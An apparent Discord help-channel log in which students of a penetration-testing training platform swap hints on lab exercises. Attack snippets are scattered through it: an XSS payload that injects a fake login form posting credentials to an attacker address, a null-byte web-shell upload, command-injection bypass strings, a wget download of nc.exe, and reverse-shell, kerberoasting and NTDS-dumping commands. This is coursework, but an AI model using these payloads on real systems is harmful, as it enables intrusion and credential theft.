mom and mom's friend are fighting again
#modules
fathom pendant
languid dawn
oh yeah right
rustic sage
Idk even what this server is for
solid python
Then why did you join
rustic sage
At this point
fathom pendant
Idk even what this server is for
reading #welcome can help you figure that out
languid dawn
no but jokes aside, keep it relevant to topic
upper ruin
Sigh...I have to impersonate users in sql. That's painful.
fathom pendant
Sigh...I have to impersonate users in sql. That's painful.
OH
i remember this now..
upper ruin
Yup.
rustic sage
OH
fathom pendant
Should I do the hard lab?
sleep; otherwise you def might overlook things
upper ruin
Nah, u will see ima get it this time.
fathom pendant
the mssql portion... it's a mess
upper ruin
Big balls.
fathom pendant
it's a whole dang'ol mess
upper ruin
lemme get some water and I will sit my ahh down.
rustic sage
Can sm help me with this stuff?
fathom pendant
lemme get some water and I will sit my ahh down.
just be sure to use the enumeration techniques to find all the info on that lab
languid dawn
gotta ask a real question first to get help
fathom pendant
upper ruin
fathom pendant
bringin this classic image back
languid dawn
modules in academy literally take you from zero to hero
I'm not sure what could possibly confuse you
fathom pendant
<:NotLikeThis:479394696473477150>
it took me a while for this lab too; i think like a few hours to realize i was missing one thing from the sql part
fathom pendant
modules in academy literally take you from zero to hero
the linux fundamental module is probably the messiest module imho it's kinda all over the place
languid dawn
the linux fundamental module is probably the messiest module imho it's kinda all...
sure but in his case he was already asking what this discord is about, which is explained in #welcome, and I'm pretty he hasn't tried to start any module
fathom pendant
like this is weird
i'm just gonna call it a skill issue and move on 
just remember fqdn is q.b.z
it doesn't include any /resource/location
prisma spruce
i'm just gonna call it a skill issue and move on <:Kapp:515018215634632704> just...
q.b.z.
placid edge
i mean yeah. all the other for other modules with fqdn i've found it
fathom pendant
fqdn omits that last .
placid edge
its just this one that is giving me issues
fathom pendant
haven't done this module so couldn't tell ya
fathom pendant
i'm about to go give myself brain damage by pretending to read english composition work
prisma spruce
I don't think I've come across any software where the last dot matters, though I did read a hacker news post where the email was something like user@nl and people were confused.
placid edge
cant be bothered rn
prisma spruce
fqdn omits that last `.`
fqdn needs the last .
prisma spruce
omitted and the labels are separated by dots ("."). Since a complete
domain name ends with the root label, this leads to a printed form which
ends in a dot. We use this property to distinguish between:
- a character string which represents a complete domain name
(often called "absolute"). For example, "poneria.ISI.EDU."
- a character string that represents the starting labels of a
domain name which is incomplete, and should be completed by
local software using knowledge of the local domain (often
called "relative"). For example, "poneria" used in the
ISI.EDU domain.```I don't recall coming across anything where that has mattered.
upper ruin
When I was doing the FQDN stuff on the footprinting module in DNS section it did matter.
I made the mistake of typing inlanefreight.htb.
When it was without the last dot.
fathom pendant
^ that's likely what conditioned me
prisma spruce
I made the mistake of typing inlanefreight.htb.
That's probably because you added it to /etc/hosts instead of using dns
fathom pendant
Oh no...it's a windows host.
yes; that's why i said mssql
fathom pendant
i was not
upper ruin
well shit
fathom pendant
i remember the pain
prisma spruce
fathom pendant
because it definitely hurt
fathom pendant
China Numba One
rustic sage
verified now
fathom pendant
Hard lab is easier.
for now
upper ruin
For now.
fathom pendant
it's really just the mssql part that's a pain
bc it combines a few of the techniques
placid edge
nvr mind
i bothered and got it
even tho i swear i've tried the same answer before. Prob forgot a space in the answer
fathom pendant
even tho i swear i've tried the same answer before. Prob forgot a space in the a...
mood
placid edge
academy should strip the answer string from spaces before the check if its correct or not
to many times i've fell for that
steel grail
I got the solution for the CRUD API in academy but it says my answer is wrong
nvm got it
shrewd hazel
http://10.129.53.203/phishing/index.php?url='><deTaiLs ONpoInTERENter+=+(confirm)()//>document.write('<h3>Please login to continue</h3><form action=http://10.10.14.220/><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');document.getElementById('urlform').remove();
lost as could be on this one, this should be right
cedar void
Not sure why this command isn't working given that I created the ticket.
ls \academy-ea-dc01.inlanefreight.local\c$
" Perform the ExtraSids attack to compromise the parent domain. Submit the contents of the flag.txt file located in the c:\ExtraSids folder on the ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL domain controller in the parent domain. "
https://academy.hackthebox.com/module/143/section/1457
shrewd hazel
in host file?
next bronze
the imageurl input box should not be there
sudden pawn
Hello, I finished this step
I am stuck on the last question. Despite the filtering applied and the different account names found, nothing passes
next bronze
I am stuck on the last question. Despite the filtering applied and the different...
run it on the domain controller
sudden pawn
run it on the domain controller
I will have to log in to one of the old users?
next bronze
as user10
low star
Hi, im doing web proxies and working on the /lucky.php question. im using the script while true; do curl -s http://83.136.253.251:54893/lucky.php?getflag=true; done | grep -e htb -e HTB -e { and i know you have to get "lucky" but ive made over 5000 requests so i think im flawed, any hints π thank you
low star
Hi, im doing web proxies and working on the /lucky.php question. im using the sc...
is the -s option on curl making it so that the html isnt touching grep?
tranquil axle
the -s just removes the progressbar or potential error messages, the content of the website still shows up
since its the webproxies module I assume they wanted you to use zaproxy to just resend it automatically a thousand times and then check the response size or something like that? Your script itself looks fine I think
low star
since its the webproxies module I assume they wanted you to use zaproxy to just ...
thank you π i will continue to persist
I have sent about 10,000 requests
tranquil axle
thank you π i will continue to persist
okay nevermind, I checked, your problem is that you aren't sending the right request
you are not sending the getflag=true in the way that the website does it when you press the button
modifying your command to send the request correctly you should get the flag within 2 seconds of it running
low star
okay nevermind, I checked, your problem is that you aren't sending the right req...
YES, i will goof around even more. thank you π
low star
okay nevermind, I checked, your problem is that you aren't sending the right req...
goated
wind olive
is a bad things if i dont understand everything a 100% yet like servers or internal networks?
im a beginner
acoustic owl
is a bad things if i dont understand everything a 100% yet like servers or inter...
No, it's not bad. On the contrary. Now you know what you need to work on.
runic rampart
Good afternoon friends. Can you give me a hint in
Introduction to White Box Penetration Testing: Assessing Skills
I have authenticated and found two potential entry points for "Eval Injection" /ping and /whoami (the program keeps freezing during testing).
regal sigil
Hey can anyone help me enumerate the Hostname of a mssql server
So far i have tried nmap scripts but got nothing from that
I am referring to the MSSQL footprinting module
soft cedar
So far i have tried nmap scripts but got nothing from that
It should work, recheck your nmap syntax and IP.
you can also use metasploit to ping mssql iirc
buoyant escarp
Hey can anyone help me enumerate the Hostname of a mssql server
||--script ms-sql*||
slate gate
mine isnt, trying to do the pivoting module
wtf lmao
im on the second chapter and target wont go up
so its not tht i think
fathom pendant
the servers tend to shit the bed on the weekends
buoyant escarp
meh the Password Attacks module is mostly Windows π¦
snow ridge
I have been trying to spawn a target for 15mins now, and I had problems earlier today + yersterday
@rustic sage I did that module 2 weeks ago and all the machines went up in like 20 seconds
fathom pendant
meh the Password Attacks module is mostly Windows π¦
it's a mix
buoyant escarp
it's a mix
yeah, im halfway through the module, at this point only 2 linux sections
fathom pendant
linux comes back
fathom pendant
@rustic sage ^ you don't see this?
message support then? try refreshing the page - logging out and back in
yes: green bubble buttom right
if you don't see it, you may need to disable ad-block
browser theme
that theme may also have not shown the target button
fathom pendant
I am trying to hack
lusty thicket
ctrl-v
plain coral
Hello everyone, could I please have some guidance on this one? I need to submit the contents of the flag.txt file located on the Administrator Desktop of the SQL01 host. This is part of the AD Enumeration & Attacks - Skills Assessment Part II. I've attempted privilege escalation through PrintSpoofer to establish a named pipe. I used a Meterpreter reverse shell payload, which I uploaded to C:\Users\Public using certutil. This challenge is doing my a** in
fathom pendant
ctrl-v
ctrl+shift+v
pasting into a terminal requires the addition of the shift key
works for me
if you're using the pwnbox (in-browser vm) you may need to enable clipboard
next bronze
Hello everyone, could I please have some guidance on this one? I need to submit ...
what guidance do you need? sounds like you've got it figured out
plain coral
I'm not getting the shell, might reboot the machine 
heavy mango
anyone else having problems spawning targets on modules?
next bronze
I'm not getting the shell, might reboot the machine <:kekhands:97399634232412164...
if printspoofer doesn't work try a potato
heavy mango
it's not that I'm not seeing the link to spawn the target, it's just that it won't spawn
next bronze
the serverse have been shitting the bed today
snow ridge
Yeah, I have been trying to spawn machine for 1 hour now. Restarted VPN, log out/login, nothing works. I guess we just have to wait
Im just reviewing other modules now and expanding my notes
heavy mango
ah, I see
snow ridge
It finally spawned
fathom pendant
It finally spawned
snow ridge
And it took 1min to do the exercise
winged elm
Yeah, I have been trying to spawn machine for 1 hour now. Restarted VPN, log out...
Ah so not just me, thanks for the info
oblique spoke
hi! I am trying to get the shell that i uploaded: ```
Content-Disposition: form-data; name="uploadFile"; filename="shell.php\x00.gif"
Content-Type: image/gif
but than i cant reach from url:/shell.php/x00.gif?cmd=id
Can anyone help? \ character always got replaced by / in the urlif the nullbyte trick worked then the file will simply be uploaded as shell.php
next bronze
then you probably need to try something else 
oblique spoke
yeah thats what i am asking
bc this is my first time trying this kind of url and it looks suspicious that this character always change in the browser /
next bronze
so what are you asking? if you can't access shell.php then the upload isn't successful
oblique spoke
this module is the upload attacks type filters
no i changed it to jpg but it was .gif before
snow ridge
Just go to "{url}/shell.php"
fathom pendant
Just go to "{url}/shell.php"
?cmd={command}
oblique spoke
i tried that
ocean matrix
I use my voutcher but I cant switch to CPTS, the voutcher stay on CBBH someone know for what?
fathom pendant
I use my voutcher but I cant switch to CPTS, the voutcher stay on CBBH someone k...
did you buy a voucher or are you referring to the silver annual
i'd reach out to support
next bronze
i tried that
you can see what your file is uploaded as at the main page, like I said, if nullbyte doesn't work, try another way
stoic arrow
Module: Cracking Passwords with Hashcat. Section: Cracking wireless... any clue on what im doing wrong?
next bronze
find another way to make it work, check the whilelist filters section
ocean matrix
did you buy a voucher or are you referring to the silver annual
where on the academy plateform, I can watch the course ?
oblique spoke
find another way to make it work, check the whilelist filters section
alright fam
fathom pendant
where on the academy plateform, I can watch the course ?
?
fathom pendant
you might need to wait a day if you just bought the plan
ocean matrix
yes I used the voutcher 2 hours ago
fathom pendant
then you may need to wait until tomorrow to switch it
but that doesn't mean you can't select another path
ocean matrix
then you may need to wait until tomorrow to switch it
okey thx for tip
fathom pendant
there also are no videos on most of the academy content
anything above tier 0 is against the rules to upload
ocean matrix
but that doesn't mean you can't select another path
On the website Idk where I need to go for follow the course of CPTS
fathom pendant
buoyant escarp
Module: Cracking Passwords with Hashcat. Section: Cracking wireless... any c...
from the back of my mind, i think you need to convert to hc2200 file format
stoic arrow
from the back of my mind, i think you need to convert to hc2200 file format
same error
buoyant escarp
same error<:FeelsBadMan:480473159175372813>
How did you convert?
stoic arrow
||./cap2hccapx.bin ../../Desktop/corp_question1-01.cap ../../Desktop/mic22000.22000||
buoyant escarp
I used cap2hashcat online converter, then like you did a 0 m2200 and rockyou
stoic arrow
I used cap2hashcat online converter, then like you did a 0 m2200 and rockyou
ill try that
cedar void
When performing a DCSync with secretdump.py in this section (https://academy.hackthebox.com/module/143/section/1508) ...when prompted for a password ...what password would we use? I tried the one in the section and one with no password...neither case worked for me.
next bronze
should be the same as the previous section
stoic arrow
I used cap2hashcat online converter, then like you did a 0 m2200 and rockyou
this way it prints less separator error, but still doing it
stoic arrow
this way it prints less separator error, but still doing it
cat output
cedar void
should be the same as the previous section
You mean this section? https://academy.hackthebox.com/module/143/section/1489
next bronze
cat output
ah you need to use v6.1.1
I remember the dev said this section is very outdated
stoic arrow
ah you need to use v6.1.1
thx god, much appreciated
next bronze
I'll add it to erratum
unique locust
attacking application with ffuf -> Sub-domain fuzzing, someone?
teal breach
hello, can someone give me a hint on the advance command obfuscation for bypassing the pipe (|) ? i already tried ||bash<<<$(base64%09-d<<<fA==)|| and ||$(tr%09'!-}'%09'"-~'<<<{)|| but it's not working
lusty thicket
attacking application with ffuf -> Sub-domain fuzzing, someone?
yes
unique locust
i try to run ffuf with the subdomain1milion-5000 on the inlanefreight.com
and i get 4 response - www/ns3/blog/support
lusty thicket
hello, can someone give me a hint on the advance command obfuscation for bypassi...
is the bash command blacklisted?
teal breach
is the `bash` command blacklisted?
i think no
lusty thicket
i try to run ffuf with the subdomain1milion-5000 on the inlanefreight.com
try with the common.txt wordlist
lusty thicket
i think no
try bypassing with one of the methods shown in that section like ||bβaβsh||
teal breach
try bypassing with one of the methods shown in that section like ||`bβaβsh`||
i think it isn't blaclisted because when i tried to run ||bash<<<$(base64%09-d<<<fA==)|| it still works perfectly fine, but when i combine it with "grep root", i didn't get the path containing root only
buoyant escarp
this way it prints less separator error, but still doing it
so to be clear,
you unzip the file
cap2hashcat online convert the .cap file
download it (.....hc22000)
hashcat -a 0 -m 22000 .....hc22000 rockyou
i dont know what extension you use there hccapx, if i convert it its hc22000
rich wraith
I tried pwncat-cs to catch a reverse shell, but it says ,,channel unexpectedly closed" (its working with netcat)
buoyant escarp
i think you are giving hashcat the wrong file
desert cypress
Hi, I have a quick question about the ATTACKING COMMON APPLICATIONS for PRTG Network Monitor module. I would like to brute force the password, but it is extremely slow, and I would like to understand why. When I use curl on the /public/login.htm page I get an almost immediate response, but when I try a curl of this type
the response takes a very long time. In addition, with burp, I notice a 302 Moved Temporarily when I test with my repeater.
buoyant escarp
i havent done this but maybe follow the 302 by -L
spring sonnet
Hi, has anybody currently problems with targets in Academy modules not spawning?
hot grove
not by my knowledge so far, ill go ahead and spin up a target real quick
buoyant escarp
Hi, has anybody currently problems with targets in Academy modules not spawning?
yea
spring sonnet
Thanks. Pwnbox works Like a Charm...
hot grove
target spawned
spring sonnet
Okay, now it started. Seems to be a temporary Thing on my Side. Thanks!
rough flame
Can I DM anyone regarding NTLM Relay attacks - skills assessment?
desert cypress
i havent done this but maybe follow the 302 by -L
It shortens the response time, but it's still too long for brute force π , to you know if is possible to follow the redirection with fuff ?
desert cypress
i havent done this but maybe follow the 302 by -L
so it's the reditrect that increases the response time?
solar pecan
hey guys... Do you have problems spawning target machines?
next bronze
Can I DM anyone regarding NTLM Relay attacks - skills assessment?
sure
buoyant escarp
Password Attacks
PtH
i have problems understanding the question.
do they want me to:
- impersonate julian via PtH
- spawn powershell via PtH
- import Invoke-TheHash, but its already there in C:\tools
- make a reverse shell from DC01 to MS01?
am i getting this correct?
spring sonnet
hey guys... Do you have problems spawning target machines?
Look some Messages above. I Had a temporary Problem. After some waiting, it worked
buoyant escarp
It shortens the response time, but it's still too long for brute force π
, to y...
ffuf can follow 302 by -follow iirc
desert cypress
ffuf can follow 302 by -follow iirc
Thank I will try
buoyant escarp
so it's the reditrect that increases the response time?
i dont know
hot grove
might be latencyb issues, pings taking quite some time it looks like
desert cypress
might be latencyb issues, pings taking quite some time it looks like
Given the problems with the target machines at the moment, it is possible that the redirect increases the response time considerably. I'll try again when the boxes are better.
soft cedar
Password Attacks
PtH
i have problems understanding the question.
do they want me...
- Yes, You impersonate Julio via pth
- Launch PS to perform pth from MS01 host to DC01 host(connect first via rdp with Julioβs hash)
- Invoke-The hash is a collection of PS functions for performing pth, to use the function we need to import the module that contains it.
- Yes.
Kindly reread that section.
buoyant escarp
1. Yes, You impersonate Julio via pth
2. Launch PS to perform pth from MS01 hos...
ty
buoyant escarp
where comes the username from, svc_workstations? from a scan like mimikatz sekurlsa::logonPasswords?
quiet shuttle
Hi Guys , are here Somebody who is really good at Monitoring , need a little Bit Help . Some Guys are Monitoring me For beeing Not normal in they opinion . They siting in the room behind me and read all the Things iam writing on my Phone and have some Videos from me , how is this possible. Antivirus dont find anything. Phone reset dont Work, Change number , Phone , country and so much Things. Where i get to , is it a Projekt or some thing . Iam Not Paranoid.
sterile epoch
Hi Guys , are here Somebody who is really good at Monitoring , need a little Bit...
the third eye sees all
sterile epoch
These Guys are normal Guys .
the third eye is also another odinary eye
quiet shuttle
Serious ?
quiet shuttle
They Trying to Bring me to suicide i think but iam Not doing this ether.
sterile epoch
They Trying to Bring me to suicide i think but iam Not doing this ether.
dude ask the police
quiet shuttle
Everthing they doing is useless
sterile epoch
and get help
quiet shuttle
Police cant Help iam in Russia perhaps they will so the Same
lusty thicket
quiet shuttle
Iam from Germany and they Filmed me there i think , then j Go to Russia and they send all this shit here
sterile epoch
dude dont talk here lord putin is watching I wanna be on his good side in case of war
we talk about academy stuff here
sterile epoch
Thanks For Help , Nobody knows with what Programm is it possible?
maybe try asking a church
the fathers are well trained in this type of guidance
or whatever faith ypu use
sorry for assuming
shell oak
I'm stuck on the AD Enumeration & Attack Skills assessment 1: I have 3 reverse shells, one is nc, one is metasploit, one to a different machine using metasploit. This is probably unnecessary but I hate loosing shells. I have uploaded 3 different tools to kerberoast the user and none of them work. It is like they dont execute. I cant import-module, katz and rube fail to provide any output. What am I missing? Can someone assist in this?
steel dock
Hi everyone. Is there I way I can verify my discord account with my HTB academy account? I checked under #welcome, but I only have HTB Academy, not "plain" HTB
next bronze
make an account
next bronze
I'm stuck on the AD Enumeration & Attack Skills assessment 1: I have 3 reverse s...
which question
shell oak
which question
"Kerberoast an account with the SPN MSSQLSvc/SQL01.inlanefreight.local:1433 and submit the account name as your answer" is the question.
next bronze
one of the ways is to import powerview, but wdym you can't import
languid wharf
Hi, when trying to spawn a lab at the end of a section I get stuck on Target is spawning... and it loads forever. Is there a problem with the servers or it's something in my side?
shell oak
one of the ways is to import powerview, but wdym you can't import
I type PS C:> import-module .\PowerView.ps1 and it hangs for a second but never imports. If I try any of the functions of PowerView nothing happens. I was able to get the account name using setspn.exe , I can load the ticket into memory, and validate that it is there using klist, but any of the tools I try to dump it fail
snow ridge
Hi, when trying to spawn a lab at the end of a section I get stuck on ` Target i...
servers are slow
languid wharf
servers are slow
It's ten times worse than it is usually
analog dock
I type PS C:\> import-module .\PowerView.ps1 and it hangs for a second but never...
If you can get the account name with Setspn, you have the answer to the question?π€·πΌββοΈ
buoyant escarp
Password Attacks
PtH
last question
i cant get the reverse shell.
||
- RDP as julio
- start powershell as admin
- start powershell as admin for nc listener
- import stuff
- launch Invoke_WMIExec at target DC01, domain inlanefreight.htb, user julio, hash juliohash, command is base64 powershell for reverseshell at ip 172.16.1.5(MS01)
||
shell oak
If you can get the account name with Setspn, you have the answer to the question...
I'm sorry. I can answer question 2, but not able to get the hash to crack it.
next bronze
use Get-DomainSPNTicket from powerview, if it didn't get imported correctly it will tell you the cmdlet is not found
analog dock
I'm sorry. I can answer question 2, but not able to get the hash to crack it.
I uploaded mimikatz with the webshell, then went for a reverse shell using msfvenom
next bronze
or mimikatz yes
analog dock
Then it was a matter of following section
shell oak
use Get-DomainSPNTicket from powerview, if it didn't get imported correctly it w...
PowerView wont load. MimiKatz will not load either, Rubeus will not load.
shell oak
Like I said I used a revshell
I have 3 reverse shells. My user is system. Not one of the shells nc or metasploit will work.
analog dock
msfvenom with windows/shell_reverse_tcp payload
And output it to an exe
Works fine
shell oak
msfvenom with windows/shell_reverse_tcp payload
I'll try that. Thanks
next bronze
I mean even Get-DomainSPNTicket will work in the webshell
shell oak
I mean even Get-DomainSPNTicket will work in the webshell
PS C:> Rubeus.exe kerberoast /nowrap
PS C:> Get-InstalledModule
PS C:> Get-DomainSPNTicket
PS C:>
PS C:> .\mimikatz_64.exe
PS C:\users\administrator\desktop> c:.\Rubeus.exe kerberoast /outfile:hashes.kerberoast
PS C:\users\administrator\desktop> ls
PS C:\users\administrator\desktop> import-module PowerView.ps1
PS C:\users\administrator\desktop> Get-DomainUser * -spn
none are working
shell oak
I mean even Get-DomainSPNTicket will work in the webshell
Mimikatz has been hanging for 35 minutes
soft cedar
Password Attacks
PtH
last question
i cant get the reverse shell.
||
1) RDP as j...
From your last ss, why are you passing the hash for svc_workstations when the question specifies Julio?
upper ruin
My lad, you gotta escalate to root.
And grab the ticket.
It's in the /tmp/
Francly svc workstation is in the sudoers list.
So yk what to do.
cedar void
"Perform the ExtraSids attack to compromise the parent domain from the Linux attack host. After compromising the parent domain obtain the NTLM hash for the Domain Admin user bross. Submit this hash as your answer. "
I am having trouble finding the user bross. "||raiseChild.py -target-exec 172.16.5.5 LOGISTICS.INLANEFREIGHT.LOCAL/htb-student_adm||
"
next bronze
you have system on DC, need I say more?
buoyant escarp
From your last ss, why are you passing the hash for svc_workstations when the qu...
i dont, it was just a question from previous ss
i use julio
but i am not sure why the reverse shell doesnt land on MS01
cedar void
you have system on DC, need I say more?
I looked at the Users on DC and I did not see bross
next bronze
what did you use to look at the users?
languid wharf
had wait over 1hr today for machine to spawn
Same, it still didn't spawn for me, over 20 minutes. Something happened today? Everything worked smoothly yesterday
soft cedar
but i am not sure why the reverse shell doesnt land on MS01
You didnβt catch the shell?
Whatβs your output
buoyant escarp
You didnβt catch the shell?
Whatβs your output
i dont get any output, no PID whatsoever, i tried running command whoami, but that does not output anything, so its not the payload thats the issue, i think something else is wrong
i think i gonna restart the machine
soft cedar
Bet
shell oak
I mean even Get-DomainSPNTicket will work in the webshell
I'll restart the victim and see if this clears up. Thanks for trying to help.
leaden pond
Module: Windows Privilege Escalation
Section: Skills Assessment Part I
I've gotten a reverse shell on the target, but I'm having trouble uploading tools to it. Here is the command I used: wget http://10.10.15.130:8080/nc.exe -UseBasicParsing -OutFile nc.exe
In the window on my attack box where I'm hosting the Python web server, I see the connection from the target (no error messages), but the file does not download (and I don't get any error messages on the target side either).
leaden pond
Good catch. That was just a typo on Discord though. I put the command in correctly on the lab.
next bronze
Module: Windows Privilege Escalation
Section: Skills Assessment Part I
I've got...
that should work, the file will be downloaded to the current dir
tulip dragon
leaden pond
that should work, the file will be downloaded to the current dir
Hmmm... It's not showing up in the current directory when I run dir, and I also ran Get-ChildItem -Path C:\ -Recurse -Filter nc.exe and got no hits.
quiet shuttle
Hi Guys , are here Somebody who is really good at Monitoring , need a little Bit Help . Some Guys are Monitoring me For beeing Not normal in they opinion . They siting in the room behind me and read all the Things iam writing on my Phone and have some Videos from me , how is this possible. Antivirus dont find anything. Phone reset dont Work, Change number , Phone , country and so much Things. Where i get to , is it a Projekt or some thing . Iam Not Paranoid.
buoyant escarp
Hi Guys , are here Somebody who is really good at Monitoring , need a little Bit...
not the chat for this kind of stuff π
next bronze
Hmmm... It's not showing up in the current directory when I run ```dir```, and I...
where did you run the wget command and as what user
leaden pond
I landed in a reverse shell on the web server as what I believe is the web server's service account (iis apppool\defaultapppool) in the directory C:\windows\system32\inetsrv. That's the context in which I ran wget.
rustic sage
anyone know how long the average -p- scan takes
next bronze
I landed in a reverse shell on the web server as what I believe is the web serve...
might not have perms to write in that dir, try /temp or /users/public
leaden pond
might not have perms to write in that dir, try /temp or /users/public
Yep, that did the trick. Thank you!
leaden pond
might not have perms to write in that dir, try /temp or /users/public
I was assuming that any time I'm dropped into a shell as a certain user, I will have write permissions to that directory. Really helpful to know that's not the case.
next bronze
nah, you can have a shell drop you at /windows/system32 as a standard user, just depends on how the shell is configured
always safer to use a global writable dir
leaden pond
might not have perms to write in that dir, try /temp or /users/public
On a related note, is there a way to upgrade a Windows reverse shell to a shell with more features (such as tab completion and showing error messages) in the same way that we can with a Linux reverse shell? It would have been helpful in this case to see error messages saying I don't have adequate permissions.
next bronze
conptyshell
most shells will show you error messages, it's only those oneliners that don't
rustic sage
32mins waiting for pwnbox to spawn xD
I basically waited 2 days for a nmap scan
buoyant escarp
buoyant escarp
both are TCP
-sT completes the 3 way handshake
-sS is sending SYN and the server sends SYN-ACK or RST (so no complete Handshake)
UDP is -sU
rustic sage
what is the ACK
buoyant escarp
acknowledge
rustic sage
-sS/sT/sA/sW/sM: TCP SYN/Connect()/ACK/Window/Maimon scans
buoyant escarp
yeah
rustic sage
I need tolearn sA, sW, sM
buoyant escarp
try the module NMAP
rustic sage
I'm on it right now. that's why I asked about the options. My nmap scan is taking to long for my patiance
at least I only have 3% to go
In a real pentest wouldn't you always use -p-
leaden pond
conptyshell
Have you ever run into this error with conptyshell? No matter what keys I enter, it just outputs the prompt over and over.
rustic sage
"Perform a full TCP port scan on your target and create an HTML report. Submit the number of the highest port as the answer."
next bronze
Have you ever run into this error with conptyshell? No matter what keys I enter,...
why upgrade? Just run it directly
cedar void
So would I search for hashes of the user bross once I am on DC.
next bronze
So would I search for hashes of the user bross once I am on DC.
https://academ...
ntds
little ledge
rustic sage
hey g
yeah I dont know I am not even able to log in
I was doing a lab and my ssh connection cut out
leaden pond
at least I only have 3% to go
Whenever I get a new target, I always run two nmap scans (there may be a better way, but this has never failed me):
sudo nmap -p- -T5 <target>
sudo nmap -A -p[ports output from the above scan] <target>
Adding the -T5 flag to the full tcp scan really speeds it up. There may be reasons this is not a best practice, in which case I hope someone will correct me.
next bronze
t5 is fine if your connection to the target is good, I usually use t4
for double pivots I'll slow it down even more
cedar void
ntds
||ndts.dit? Something similar to this commmand: β/usr/local/bin/secretsdump.py -ntds /home/htb-ac-767577/NTDS.dit -system \Windows\System32\config\SYSTEMβ||
leaden pond
why upgrade? Just run it directly
That isn't working either for some reason.
next bronze
||ndts.dit? Something similar to this commmand: β/usr/local/bin/secretsdump.py -...
yep, you need to save a copy of ntds and system hive
next bronze
That isn't working either for some reason.
are you running it on the target
leaden pond
are you running it on the target
Yes, the target is the box I have the PowerShell session on in the second screenshot.
next bronze
||ndts.dit? Something similar to this commmand: β/usr/local/bin/secretsdump.py -...
also, you have the DA hash, you can just dcsync with that
leaden pond
does the target have internet?
Lol good point. Looks like it doesn't. I'll get on with the non-tricked-out shell then. I really appreciate your help.
indigo locust
has anybody been havig issue spawning "Target" machine ?
buoyant escarp
yes
next bronze
Lol good point. Looks like it doesn't. I'll get on with the non-tricked-out shel...
... you can host it on your own http server
and all targets don't have internet
buoyant escarp
im giving up for today, waiting 1:30h for target
indigo locust
My page has been loading for +20min which usually takes 30sec max to load
sleek lark
I was doing a lab and my ssh connection cut out
same issue network error + machine unreachable
leaden pond
... you can host it on your own http server
Alright, I got it working. Thanks!
sharp adder
Hi, my target never spawn, It keeps there for a while, I reboot my pc but nothing change and my network confg is ok.
ashen night
Same here going on 20 mins
ashen night
SWeet
verbal tree
I'm not sure is this type of questions goes to that channel but i'm starting and i would like to know if starting for the Information Security Foundations it's a good option.
cedar void
Hi, my target never spawn, It keeps there for a while, I reboot my pc but nothin...
I am now having this issue too
dapper current
Here too no target is spawning
next bronze
I'm not sure is this type of questions goes to that channel but i'm starting and...
if you're new, yes
verbal tree
if you're new, yes
ty
sharp adder
I am now having this issue too
Not gonna lie, I don't do anything, just wait and the ip appear
cedar void
Not gonna lie, I don't do anything, just wait and the ip appear
did yours ever appear?
mine did not
sharp adder
yep, right now is working well
try restarting your pc, maybe it works or at least works for me
misty saddle
I am now having this issue too
The HTB server as I understand is atm not functioning as it should.
limber river
what's going on , with the servers today ?
silk tulip
borken
buoyant escarp
Men cme is such a cool tool
next bronze
netexec is cooler
limber river
netexec is cooler
next bronze
yep, that's where all the active cme devs are at
limber river
yep, that's where all the active cme devs are at
afaik is just an alternative for cme , since cme is not supported anymore
next bronze
nope, like I said, that's where all the active cme devs are at
I guess you can consider it an alternative that's updated with new features
limber river
nope, like I said, that's where all the active cme devs are at
okay that's cool
buoyant escarp
ima have a look on it
thorn urchin
literally its the same tool renamed because of drama, and all future updates will be in that fork
buoyant escarp
ah ok
calm tapir
Need assistance with Password Attacks -Network Services (RDP) I was able to get the username and password but cannot RDP into the target to complete the task.
native turtle
can't spawning target of Dynamic Port Forwarding with SSH and SOCKS tunnelling
what can I do?
buoyant escarp
my machine spawned β€οΈ
umbral spade
crisp citrus
i am on intro to the elastic stack, i click the instance, i spawn the target, but i dont see anything to do with kibana or elastic stack in the instance itself. could anyone help with what i might be doing wrong?
buoyant escarp
is it possible that the payload is too long?
fathom pendant
is it possible that the payload is too long?
length shouldn't matter
though i swear there's a decoding step that needs to happen
buoyant escarp
in the example is no decoding 
buoyant escarp
not sure what could go wrong here
cedar void
I went back to my old notes on the NTDS.dit database on how to extract password hashes and the first thing it tells me to do is type this command to copy the c drive: vssadmin CREATE SHADOW /For=C:
But this command doesn't work for my particular machine:
Would I have to try external tools or are there other internal tools that I need to try instead?
fathom pendant
your link shows a different module entirely
try doing the commands listed in the section you linked first
cedar void
Thats the module that I meant to copy. I tried out all those commands suggested in the section and it lead me to DC machine. I know on the DC machine that it has the ntds.dit ...the directory tree that has all of the systems password hashes
buoyant escarp
omg i found the reason why it wont works
fathom pendant
there's also lsass and other types of things you can use for password hashes i.e. creating a copy of the SAM/SAVE HKLM
dumping the lsass process
buoyant escarp
i was in the folder Invoke-TheHash, and i was executing the command with .\Invoke-.....
the .\ was the fault
fathom pendant
i was in the folder Invoke-TheHash, and i was executing the command with .\Invok...
buoyant escarp
omg all these hours
fathom pendant
DNS; think what that stands for
root.inlanefreight.htb is just the admin (root@inlanefreight.htb) iirc dns uses a . to replace characters
cobalt trench
root.inlanefreight.htb is just the admin (root@inlanefreight.htb) iirc dns uses ...
I found this too and tried both ways but none worked
cobalt trench
root.inlanefreight.htb is just the admin (root@inlanefreight.htb) iirc dns uses ...
does it have something to do with the ||ptr record?||
fathom pendant
does it have something to do with the ||ptr record?||
It's way simpler than you think. Look at the ones with 127.0.0.1 and apply brain
faint rampart
Anyone else having issues spawning labs? Doing the Attacking Enterprise Networks Module and its been spawning for minutes.
barren crystal
do any modules have cryptography analysis ?
outside of like standard brute forcing
ruby finch
Hey guys I am going through the Service and Process Management section in the Linux Fundamentals module. I am asked to launch OpenSSH using systemctl start ssh. When I do I get
Authentication is required to start 'ssh.service'.
Multiple identities can be used for authentication:
1. Debian (debian)
2. ,,, (htb-ac-1137339)
Choose identity to authenticate as (1-2)
What password are they asking for for each option? I tried my account password and the default password for PorrotOS but nothing worked and I get "Failed to start ssh.service: Connection timed out
See system logs and 'systemctl status ssh.service' for details." What should I do ?
steel grail
Have you tried something like admin1 or password1?
Iβm surprised it doesnβt say in the module
fathom pendant
Hey guys I am going through the Service and Process Management section in the Li...
The password for ssh is on the pwnbox desktop, you aren't really required to start any services, and ssh is already started on the pwnbox
fathom pendant
Have you tried something like admin1 or password1?
For the in-browser vm (pwnbox) the password is randomly generated and is located in a file on the desktop
ruby finch
The password for ssh is on the pwnbox desktop, you aren't really required to sta...
yeah I was thinking that because when I checked the status I saw that it was already "active". Thanks!
fathom pendant
I also generally suggest using your own VM instead of the pwnbox
More control over the environment and versions of tools
ruby finch
